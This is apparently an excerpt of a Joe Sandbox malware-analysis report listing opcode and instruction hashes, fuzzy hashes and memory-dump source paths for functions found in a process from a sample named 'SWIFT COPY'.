                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ba246b0379f0d402b4a5941f672b5446a7bfdb38383b0d564d89f0bc6a99d681
                                                                                              • Instruction ID: 64c38eaa4ca43d2e4e67f4628c27610479f4024626908f684a37398cdef88ec9
                                                                                              • Opcode Fuzzy Hash: ba246b0379f0d402b4a5941f672b5446a7bfdb38383b0d564d89f0bc6a99d681
                                                                                              • Instruction Fuzzy Hash: 6E1127B16183099FC710DF6DD48199ABBE8FF99754F00855ABA98D73A0E634E9008B92
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                              • Instruction ID: e8b3cabc612fdb750ce2477cd0f870ee7588ab01a678a03cf065439c251f3b2e
                                                                                              • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                                              • Instruction Fuzzy Hash: 1F017C322046849FE326971EC948F367BECFF85758F0904B1F915CBA92D66CEC40C621
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f0dc39dcbaa2a5791488a849f22567595bf5f0a8eb55369124e353153c5fada
                                                                                              • Instruction ID: 37880d7d53f88c5775ba4c9a84651b2932482f9c800098c5a3be45c8c5a732b8
                                                                                              • Opcode Fuzzy Hash: 2f0dc39dcbaa2a5791488a849f22567595bf5f0a8eb55369124e353153c5fada
                                                                                              • Instruction Fuzzy Hash: 7D01F232700619DBD724FF6DE850AEEB7F8FF85218B1540A9DA06A7A94EE30DD01C690
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: d125008ce9615593687bee5afdef3145725e4f114c62874a4161da0cb9d7456d
                                                                                              • Instruction ID: 1b6060a9dfb5c7363f90bc5784e4139dba67555205dc9352656dc55f46ceb079
                                                                                              • Opcode Fuzzy Hash: d125008ce9615593687bee5afdef3145725e4f114c62874a4161da0cb9d7456d
                                                                                              • Instruction Fuzzy Hash: 2201A7722447119FD3315F19E840F16BEB8EF95B54F11443AF6059F3A0D6B4A8818B54
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 650f2a9e139e6cf7d1da8b28a967a7c98f7b6c2a12f899b1d616ca84f94b96ec
                                                                                              • Instruction ID: 52f5776d385fee9f82eb3db6658060ae3971da654d9f8abd812b339a9dd1a36d
                                                                                              • Opcode Fuzzy Hash: 650f2a9e139e6cf7d1da8b28a967a7c98f7b6c2a12f899b1d616ca84f94b96ec
                                                                                              • Instruction Fuzzy Hash: C9F0F432A41B20B7D7319B5A8C40F57BAEDEBC4A98F004028A60997640DA30ED01CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                              • Instruction ID: 5d953e06a2b62d47d3eb082995bcc67fde880601a2c07044a7d8e07968aa901d
                                                                                              • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                                              • Instruction Fuzzy Hash: 45F0C2B2A00611ABD334CF4DDC40E57FBEEDBD1A98F048128A909CB220EA31ED04CB90
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 489805d584f566000f21422a608fd63190ce98efc3d9b33bfaae985ff40cccf1
                                                                                              • Instruction ID: d129780469d30fd0943df10966ccccfd8121d4210a542cf52d91fea8a0059887
                                                                                              • Opcode Fuzzy Hash: 489805d584f566000f21422a608fd63190ce98efc3d9b33bfaae985ff40cccf1
                                                                                              • Instruction Fuzzy Hash: 91014F71A1020AEFDB14DFADD551AAEB7F8FF58304F10406AF905E7390D678AA019BA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                              • Instruction ID: 0d814f7a3080e568448eff5109ed09d01e9f1f86c5dd3f6cd96e1b29ef41ff8f
                                                                                              • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                                              • Instruction Fuzzy Hash: EEF0FC732446339BD733365D4840BAFB5998FD5AACF191435E3099B600CA68CD0257D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 99d9e742d344a638d961550710668a49e124ce8ad5aa4346295af340ee8c1775
                                                                                              • Instruction ID: 1da487725c71a950aff20fe0c43c220504982d553a2088741147dd73f91dead5
                                                                                              • Opcode Fuzzy Hash: 99d9e742d344a638d961550710668a49e124ce8ad5aa4346295af340ee8c1775
                                                                                              • Instruction Fuzzy Hash: F0018471A0020AEFCB04EFADD4419AEB7F8FF58304F10406AF901E7391D674A901CBA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6ec1f3420013cff564b5bc41900698524d1d65093d6dab7499eff82b403e6b8e
                                                                                              • Instruction ID: d76cb7d76277d1ff353c19122f0a8fd07a5917387f02ee2ef55a48cda06c99ba
                                                                                              • Opcode Fuzzy Hash: 6ec1f3420013cff564b5bc41900698524d1d65093d6dab7499eff82b403e6b8e
                                                                                              • Instruction Fuzzy Hash: 53014F71A0020AEFDB14DFADD441AAEBBF8FF58304F50406AF915E7390D674AE018BA1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                              • Instruction ID: 74ef060f71582809a9c3fb8709b05e4c66757ddafc20f5a4a936fd83a5bb4489
                                                                                              • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                                              • Instruction Fuzzy Hash: FE01F4322046899BE322971DC805F59BBDCEF4175CF0880A5FA849BAA1D678D801C210
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f5a688584eeb6b6bcf9edaec597c2f28eabd2d77f11f81be4094c1a782f120c2
                                                                                              • Instruction ID: 73ce258eaf389582f7e8b8e50baa09b0bf9ed440bceae078d6cb84c9843ce464
                                                                                              • Opcode Fuzzy Hash: f5a688584eeb6b6bcf9edaec597c2f28eabd2d77f11f81be4094c1a782f120c2
                                                                                              • Instruction Fuzzy Hash: 80018F71A00259EBDB10EFADD841AEEBBF8FF58314F14006AE901A7390D774EA01CB95
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                              • Instruction ID: 9526ff9b524c701247099bdd6778be299013a99d51b80ac0c2d4b3a0b7c35242
                                                                                              • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                                              • Instruction Fuzzy Hash: F3F01DB220001DBFEF019F99DD81DEF7BBEEB59698B104125FA11A2160D635DD21ABA0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fa2936a2322ba9270f0a689df468798887c190fa223431940693706f4aeb331d
                                                                                              • Instruction ID: 5f856011f23ada78868d53b0da87e723f4e59ea6a8f2c34548b26e589b57c786
                                                                                              • Opcode Fuzzy Hash: fa2936a2322ba9270f0a689df468798887c190fa223431940693706f4aeb331d
                                                                                              • Instruction Fuzzy Hash: 4F018936500619EBCF229E84D840EDA7F66FB4C758F058101FE1866620C736D970EB81
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 7355b6968bc3accf7b9180d1f39aa7d20ed743af19167d435d70de5a9342f577
                                                                                              • Instruction ID: dc50f30b161a13659174f51448c0268099096f70fe668825af38e000afd35ae4
                                                                                              • Opcode Fuzzy Hash: 7355b6968bc3accf7b9180d1f39aa7d20ed743af19167d435d70de5a9342f577
                                                                                              • Instruction Fuzzy Hash: 70F024712042619BF311B61D9C13B66329AEBC065CF35902AEB098B6C1E971FC01C394
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d60e8469937a3839371657e130517932c7b8d10eebec74cc23749972a552f762
                                                                                              • Instruction ID: 6aa0c393feda5f7e2de1bf176537b9bd9f004871d528a4c1fd5c489e5e0cbb7a
                                                                                              • Opcode Fuzzy Hash: d60e8469937a3839371657e130517932c7b8d10eebec74cc23749972a552f762
                                                                                              • Instruction Fuzzy Hash: D00149B0204685DFE3329B6CCD4AB6537ECFB41B4CF8C8154FB419B9D6E768D4418610
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                              • Instruction ID: b6cb93d54e75a6e31ccbc8f3a7d7dd0ba995e0fc8783b4613e5a3f8cfb88caf6
                                                                                              • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                                              • Instruction Fuzzy Hash: 32F02E33341E1347E776AA2DB410B2FB695AF90D08B05852CA505CBE80DF30DC20C780
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                              • Instruction ID: a423658f5187809669b1ba2d9dd3a328047db8d2a2276a7fd2059cd06a59f753
                                                                                              • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                                              • Instruction Fuzzy Hash: 93F05E32711A229BE7219A4EDCC0F96BBA8EFD5E64F190075A704DBA60D760EC0187D0
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 5a6f40de4c6a4d185d7021dd847fe5dc7cdfb1106d1080ee7292300b80b575b7
                                                                                              • Instruction ID: f41ffad7595b626edf5114ec50de2cfebbe6248445ae42c8b1ca9003752d25ad
                                                                                              • Opcode Fuzzy Hash: 5a6f40de4c6a4d185d7021dd847fe5dc7cdfb1106d1080ee7292300b80b575b7
                                                                                              • Instruction Fuzzy Hash: 4DF0AF706093099FC720EF28C841A1ABBE4FF98714F40465AB998DB390E634E901C796
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                              • Instruction ID: 570b755b6f942b1977c15f676ca22e3ba795a9a240d0485bf1490c119e0154d7
                                                                                              • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                                              • Instruction Fuzzy Hash: 16F0B472610204AFE728DB29CC01F96BBEDEF98348F14C078A545E7164FAB0ED41C654
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: aaee1204e9218be8dd7ab06d7e08cedf8cd17929e25ad8bc7564c87a99100015
                                                                                              • Instruction ID: 00917f66fc9eba3871823f4aefd7d9d001155d956d1a28138b4b55a2bcc65f3d
                                                                                              • Opcode Fuzzy Hash: aaee1204e9218be8dd7ab06d7e08cedf8cd17929e25ad8bc7564c87a99100015
                                                                                              • Instruction Fuzzy Hash: EBF06270A0124DEFDB14EF69C555A9EB7F4FF18304F00805AB955EB395EA38EA01CB51
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 4a28559e8154344e4332eb8d36a64778f48e1b29e9312ddcee3ea44c927ad549
                                                                                              • Instruction ID: 7b1a8d53454827757eaf52a28716025bae2b9c084be96a885c97eb1eb9376dfd
                                                                                              • Opcode Fuzzy Hash: 4a28559e8154344e4332eb8d36a64778f48e1b29e9312ddcee3ea44c927ad549
                                                                                              • Instruction Fuzzy Hash: D9F0F0359026D48FE722CB1CC404B217FC89B8062CF08886AC58D8B542D321D880CA48
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: eacc27b9f092d5e8654f7067d2b7206f821e3ed7027db75e75aa053084fd6b9c
                                                                                              • Instruction ID: 283589124038a87f7a40d56533aa31989e3e9764dcf531993b4e93e2724b38b1
                                                                                              • Opcode Fuzzy Hash: eacc27b9f092d5e8654f7067d2b7206f821e3ed7027db75e75aa053084fd6b9c
                                                                                              • Instruction Fuzzy Hash: 48F0277E5167D006CF365F2C64542D12FA6A756018F5A104DDAA167217C97484C3C724
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: fc01e45632359b7f67b22571623df58b46c36adfe24154223910e77e97e2d85e
                                                                                              • Instruction ID: cf2a9fd3f4e5153705ab5c925ecf8790c0300b964625e48ccc3e37eb8c8057b0
                                                                                              • Opcode Fuzzy Hash: fc01e45632359b7f67b22571623df58b46c36adfe24154223910e77e97e2d85e
                                                                                              • Instruction Fuzzy Hash: 7DF0B871511A919BE7229B1CC148B21BBECAB007BCF0CF426D5CA8795AC264FC84CA98
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                              • Instruction ID: a77f7974ec07dfe0f0eb0fd0e207abbb978df57bcc96627393ba6cf9a0f80987
                                                                                              • Opcode Fuzzy Hash: 6c7572fa5744a55e43c142e8942155ae64e2404789e34097860efd8d5a2ca0e7
                                                                                              • Instruction Fuzzy Hash: 6BE0D8723006012BE7329E5D8CC0F4777AEEFD2B28F04007AB5045F251C9E6DC0982A4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                              • Instruction ID: beb287c2ae8121b03afc1691e0c9f0ab453b01433fbb1e734d85560a27d7174c
                                                                                              • Opcode Fuzzy Hash: 2f21787fc4cf88bc2024fb188b518997cea13084236808dfde9be923dffdf6d3
                                                                                              • Instruction Fuzzy Hash: 2BF065B2108214DFE3218F49D945F52B7FCEB05768F45C029E609AB661D379EC40CBA4
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                              • Instruction ID: 618ac1627af7dc219b6032460376b5038500777092084810e114fbb3c6c8fa6a
                                                                                              • Opcode Fuzzy Hash: 09d204908d37cdfbcfc5d4a721560e7c3d6986de64c378e18d154b12347e5c6c
                                                                                              • Instruction Fuzzy Hash: ADF065392087559BDB1BDF29D050A957BE8FB95358B040095F8468B351D731E981CB94
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                              • Instruction ID: 0f45d10904ef297b4a0011dd4fd8219c450a5b5044fdad731d4ee71302b40197
                                                                                              • Opcode Fuzzy Hash: f1b670d1cf9650df618e53f56da6216e466ca8c332a8d3f17e7fbf4f9511b07c
                                                                                              • Instruction Fuzzy Hash: 59E0D832A44149BBE3311E5DC800F6E77ADDBD0BA8F158429E2448B554DB70DC40C7E8
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c3665b4b9eb8dcf6cd17bef05985f36d9da315b4d8b26a43a61fc913ae54fbf8
                                                                                              • Instruction ID: 69b506f70908a5a42045b65a4110228bd66642215ea9c0ad43447537060ac0f1
                                                                                              • Opcode Fuzzy Hash: c3665b4b9eb8dcf6cd17bef05985f36d9da315b4d8b26a43a61fc913ae54fbf8
                                                                                              • Instruction Fuzzy Hash: BEF0E531A259914FE773D76ED548B5377E0EF10634F0E0576D5008BAA6C334EC80C650
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                              • Instruction ID: 42bf73f882701fd8ade9f11f3ae4d258314b9ccaa0cb2d3e71f9b4d48b958549
                                                                                              • Opcode Fuzzy Hash: 9c57e87189bc66aa7caf2535f5315d36853ca328742cb6eaba8c93c68780cd6a
                                                                                              • Instruction Fuzzy Hash: 54E0DF73A00114FBDB219B998D02F9ABEACDBA0EA8F064054B600E7090E530EE00C690
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                              • Instruction ID: cba77a5b7d501c34384910de9aeac6671445b9425843048fe8287d6a13bab690
                                                                                              • Opcode Fuzzy Hash: c6a5ad91a7d0f1a4d9806dabaf8f22ecb250b1deeb68cfbfcde1a852261f70b4
                                                                                              • Instruction Fuzzy Hash: 2BE065326403508BCB268A1BC140B63B7A8EFA56A0F15807BE94547762D231E942D690
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID: InitializeThunk
                                                                                              • String ID:
                                                                                              • API String ID: 2994545307-0
                                                                                              • Opcode ID: d9fe9c7acd9967cab06f89664a51b5c5048656e4fbc584e24fdcaccf119f2450
                                                                                              • Instruction ID: 0e23dcd84f924348c096e55cad9e4e9c8d0e8b0f057f2df7bc7da54b3be39568
                                                                                              • Opcode Fuzzy Hash: d9fe9c7acd9967cab06f89664a51b5c5048656e4fbc584e24fdcaccf119f2450
                                                                                              • Instruction Fuzzy Hash: 26E092321006549BC731BF2DDD01F9B779AEFA0368F014515F115571A0CA34AC50C788
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                              • Instruction ID: 65b031bb2b80fd6875b053be05b61ca0e86776baa931854ee2fb5d688007c36c
                                                                                              • Opcode Fuzzy Hash: 1c3962ef014767a9d047a1ce435ecdb8fc5cd5a05dfca32f291fec24eb47eca0
                                                                                              • Instruction Fuzzy Hash: A2E0ED31010661DBEB366F2ED94CB52BAE5EF50719F148829A19A125F0C7B59881CA40
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000003.00000002.2224917606.0000000001300000.00000040.00001000.00020000.00000000.sdmp, Offset: 01300000, based on PE: true
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_3_2_1300000_SWIFT COPY.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                              • Instruction ID: a1de2326aa8133c8b16e0fa5bedb329852028da5f16a9906a0f7194f5b53829b
                                                                                              • Opcode Fuzzy Hash: d217a6aac874400d2fdd0dd0cc4ad7a97c57c110d53f39d941a96e3fabb04b1b
                                                                                              • Instruction Fuzzy Hash: 8AE0C2343003058FE715CF19C080BA2BBB6BFD5A14F28C068AA498F606EB32E842CB44
                                                                                              Memory Dump Source
